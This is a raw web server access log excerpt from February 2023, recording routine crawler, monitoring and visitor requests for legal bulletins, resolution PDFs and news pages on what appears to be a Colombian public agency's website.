172.22.2.4 - - [05/Feb/2023:01:18:58 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1038
201.245.192.253 - - [05/Feb/2023:01:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42351
172.22.2.4 - - [05/Feb/2023:01:19:04 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 200 1107785
172.22.2.4 - - [05/Feb/2023:01:19:06 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 1488992
172.22.2.4 - - [05/Feb/2023:01:19:22 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [05/Feb/2023:01:18:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Feb/2023:01:20:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Feb/2023:01:18:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
172.22.2.4 - - [05/Feb/2023:01:20:53 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
66.249.79.107 - - [05/Feb/2023:01:21:22 -0500] "-" 408 -
40.77.167.251 - - [05/Feb/2023:01:22:01 -0500] "GET /bla/resoluciones/autos%202021/5384.pdf HTTP/1.1" 200 796355
152.61.128.50 - - [05/Feb/2023:01:23:00 -0500] "GET / HTTP/1.1" 200 319
69.171.251.5 - - [05/Feb/2023:01:23:30 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
201.245.192.253 - - [05/Feb/2023:01:23:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
173.252.107.19 - - [05/Feb/2023:01:25:21 -0500] "GET /bogota-tendra-la-primera-planta-de-termovalorizacion-de-colombia-la-cual-convertira-los-residuos-en-energia-para-la-ciudad.html HTTP/1.1" 206 883
216.245.221.92 - - [05/Feb/2023:01:25:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Feb/2023:01:23:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Feb/2023:01:24:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56474
201.245.192.253 - - [05/Feb/2023:01:28:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
95.108.213.56 - - [05/Feb/2023:01:28:52 -0500] "-" 408 -
201.245.192.253 - - [05/Feb/2023:01:28:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38870
201.245.192.253 - - [05/Feb/2023:01:28:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42351
157.55.39.142 - - [05/Feb/2023:01:29:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 275663
216.245.221.92 - - [05/Feb/2023:01:30:27 -0500] "HEAD / HTTP/1.1" 200 -
162.55.37.179 - - [05/Feb/2023:01:30:34 -0500] "GET / HTTP/1.1" 200 319
162.55.37.179 - - [05/Feb/2023:01:30:35 -0500] "GET / HTTP/1.1" 200 4720
162.55.175.158 - - [05/Feb/2023:01:30:45 -0500] "GET / HTTP/1.1" 200 319
162.55.175.158 - - [05/Feb/2023:01:30:45 -0500] "GET / HTTP/1.1" 200 4720
191.111.20.117 - - [05/Feb/2023:01:31:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3944.pdf HTTP/1.1" 200 19418
191.111.20.117 - - [05/Feb/2023:01:31:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3945.pdf HTTP/1.1" 200 630864
172.22.2.4 - - [05/Feb/2023:01:29:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.97 - - [05/Feb/2023:01:31:49 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 438114
52.167.144.49 - - [05/Feb/2023:01:31:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 358631
40.77.167.234 - - [05/Feb/2023:01:31:58 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 283894
172.22.2.4 - - [05/Feb/2023:01:30:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
191.111.20.117 - - [05/Feb/2023:01:32:43 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
185.119.81.103 - - [05/Feb/2023:01:32:48 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [05/Feb/2023:01:32:49 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
40.77.167.251 - - [05/Feb/2023:01:32:52 -0500] "GET /bla/resoluciones/autos%202021/6529.pdf HTTP/1.1" 200 1547926
191.111.20.117 - - [05/Feb/2023:01:32:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0547.pdf HTTP/1.1" 200 545534
